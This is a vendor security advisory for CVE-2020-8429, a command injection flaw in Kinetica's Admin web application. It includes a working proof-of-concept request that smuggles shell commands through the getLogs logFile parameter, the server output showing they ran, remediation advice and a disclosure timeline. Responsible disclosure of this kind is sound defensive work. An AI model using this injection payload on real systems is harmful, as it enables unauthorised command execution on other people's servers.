Technical Advisory: Command Injection

Vendor: Kinetica
Vendor URL:
Versions affected:
Systems Affected: All
Author: Gary Swales
Advisory URL / CVE Identifier: CVE-2020-8429
Risk: High (Command Injection on the underlying operating system)


The Kinetica Admin web application version did not properly sanitise the input for the function getLogs. This lack of sanitisation could be exploited to allow an authenticated attacker to run remote code on the underlying operating system. The web application allows for administrators to view statistics and manage different users of the application.


The logFile parameter in the getLogs function was used as a variable in a command, which was used to read log files, however due to poor input sanitisation it was possible to bypass the single quote replacement and break out of the command. As the search and replace was replacing one quote with three quotes it was trivial to provide a working payload which can be seen in the details section.


The vulnerability allows an authenticated user to run commands on the underlying operating system.


An authenticated user could submit the following request and run commands on the underlying server:


/gadmin/resources/gpudbManager/getLogs?logFile=gpudb.log';echo%20ncctest;date;' la
stNumberOfLines=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
If-Modified-Since: Thu, 1 Jan 1970 12:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Referer: https://<REDACTED>:<REDACTED>/gadmin/


HTTP/1.1 200
Date: Thu, 16 Jan 2020 17:20:49 GMT
Server: <REDACTED>
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
Content-Type: application/json
Connection: close
Content-Length: 151
{"results":"ncctestnncctestnThu Jan 16 12:20:49 EST
2020n","success":false,"error":"ncctestnncctestnThu Jan 16 12:20:49 EST


Ensure that the software is updated to the latest version, at the time of writing as the vendor states this issue has been fixed.

Vendor Communication

22/01/2020 – Vendor Notified
23/01/2020 – Vendor Notifies version is to be released on the 24/01/2020 which fixes the issue.
30/01/2020 – Vendor Notified advisory to be published in February.
03/02/2020 – Vendor updates release notes: 

Call us before you need us.

Our experts will help you.

Get in touch